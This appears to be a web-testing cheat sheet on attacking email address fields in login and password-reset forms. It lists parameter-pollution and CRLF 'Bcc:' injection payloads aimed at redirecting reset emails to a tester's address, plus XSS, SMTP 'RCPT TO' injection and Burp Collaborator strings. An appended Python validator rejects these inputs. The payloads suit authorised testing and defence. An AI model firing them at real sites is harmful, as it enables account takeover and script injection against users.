Email Address Forms
How to exploit login and forgotten password forms.
Email Address Form Payloads
The following payloads can be used when testing an email address form.
Param Manipulation and CRLF Injection
Use these payloads to try to force the web application to send legitimate password reset emails (and similar messages) to an email address you control:
email=user@lol.com&test@test.com
email=user@lol.com%26test@test.com
email=user@lol.com;test@test.com
email=user@lol.com, test@test.com
{"email":"user@lol.com","test@test.com"}
{"email":["user@lol.com","test@test.com"]}
email=user@lol.com%0D%0ABcc:test@test.com
email=user@lol.com%0ABcc:test@test.com
email=user@lol.com%0DBcc:test@test.com
email=user@lol.com\r\nBcc:test@test.com
email=user@lol.com\nBcc:test@test.com
email=user@lol.com\rBcc:test@test.com
Other checks (XSS, SSRF, SMTP Manipulation)
Use these payloads (which are all valid email addresses according to the RFC) to find other issues.
<svg/onload=alert('XSS')>@test.com
test@test(<svg/onload=alert('XSS')>).com
"<svg/onload=alert('XSS')>"@test.com
"test@gmail.com\r\nRCPT TO:<victim+"@test.com>
test@burpcollab.com
test@[burpcollab.com]
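A server-side check for the reset form's email field, added here as a defensive example (not code from the original page): it rejects every payload listed above, and the reset mail goes only to the address stored for the matching account, never to the submitted string. The function names, the strict address pattern and the sample account table are assumptions.

```python
import re
from typing import Optional

# Conservative address syntax for a form field: one local part, one "@", one
# dotted hostname. Deliberately stricter than RFC 5322 (no quoted local parts,
# comments, percent routing or domain literals); the form only has to match an
# account that was registered through the same check.
_ADDR_RE = re.compile(
    r"^[A-Za-z0-9._+-]{1,64}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}$"
)

# Characters that split one address into several, open a new mail header
# (CR/LF), or carry markup/comment/literal syntax the form never needs.
_FORBIDDEN = set("\r\n\x00,;&<>()[]\"' \t")

# Constructed sample account table: lookup key -> verified address on file.
ACCOUNTS = {"user@lol.com": "user@lol.com"}


def validate_reset_email(value) -> Optional[str]:
    """Return the normalised address if value is a single well-formed address,
    otherwise None. Expects the already URL/JSON-decoded form value."""
    if not isinstance(value, str):      # JSON array / object, not a string
        return None
    if len(value) > 254 or any(ch in _FORBIDDEN for ch in value):
        return None
    if value.count("@") != 1 or not _ADDR_RE.fullmatch(value):
        return None
    return value.lower()


def reset_recipient(submitted, accounts=ACCOUNTS) -> Optional[str]:
    """Address the reset mail may be sent to: the one stored for the matching
    account. Unknown or malformed input yields None, and the caller should
    answer identically in both cases so that accounts cannot be enumerated."""
    addr = validate_reset_email(submitted)
    if addr is None:
        return None
    return accounts.get(addr)
```

Feed the function the decoded field value (for example `%0D%0A` already turned into CR LF); the parameter-pollution payloads are then caught either by the form parser splitting the value or by the separator check here.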